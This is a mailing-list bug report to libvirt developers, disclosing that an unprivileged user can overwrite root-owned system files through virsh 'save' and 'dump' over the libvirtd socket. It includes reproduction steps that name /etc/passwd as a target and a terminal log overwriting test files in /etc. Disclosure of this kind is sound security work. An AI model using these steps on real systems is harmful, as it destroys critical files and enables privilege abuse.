I found there's a way for a unprivileged user to overwrite sensitive
system file with virsh, here's how:
1. (as an unprivileged user) start virsh and connect to the r/w socket
of libvirtd:
virsh -c qemu+unix:///system?socket=/var/run/libvirt/libvirt-sock
2. start a guest, then issue 'save' or 'dump' command, giving a
sensitive system file path as the <file> parameter, for example,
'/etc/passwd';
3. the sensitive system file will be overwritten;
Attached is a test log. I'm using libvirt-0.8.7 on a OpenClient for RHEL
6.1. And latest libvirt code shows the same symptom.
BTW, virsh expands the <file> parameter in step to an absolute path if
user-provided is not, and libvirtd interprets it as a local file. IMHO
it does not look quite right, especially when the virsh-to-libvirtd
connection is remote.
--
Thanks.
Hong Xiang
[hxiang@T420 ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Workstation release 6.1 (Santiago)
[hxiang@T420 ~]$ cat /etc/openclient-release
Open Client RHEL 64 3.10 (Gold Master)
[hxiang@T420 ~]$ libvirtd --version
libvirtd (libvirt) 0.8.7
[hxiang@T420 ~]$ virsh -V
Virsh command line tool of libvirt 0.8.7
See web site at http://libvirt.org/
Compiled with support for:
Hypervisors: QEmu/KVM LXC ESX Test
Networking: Remote Daemon Network Bridging Netcf Nwfilter VirtualPort
Storage: Dir Disk Filesystem SCSI Multipath iSCSI LVM
Miscellaneous: SELinux Secrets Debug DTrace Readline
[hxiang@T420 ~]$ ls -l /etc/precious.*
-rw-r--r--. 1 root root 2 Oct 12 11:38 /etc/precious.1
-rw-r--r--. 1 root root 2 Oct 12 11:38 /etc/precious.2
[hxiang@T420 ~]$ virsh -c qemu+unix:///system?socket=/var/run/libvirt/libvirt-sock
Welcome to virsh, the virtualization interactive terminal.
Type: 'help' for help with commands
'quit' to quit
virsh # start fc15
Domain fc15 started
virsh # dump fc15 /etc/precious.1
Domain fc15 dumped to /etc/precious.1
virsh # save fc15 /etc/precious.2
Domain fc15 saved to /etc/precious.2
virsh #
[hxiang@T420 ~]$ ls -l /etc/precious.*
-rw-r--r--. 1 root root 253777159 Oct 12 11:42 /etc/precious.1
-rw-r--r--. 1 root root 257745683 Oct 12 11:42 /etc/precious.2
[hxiang@T420 ~]$
--
libvir-list mailing list
libvir-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/libvir-list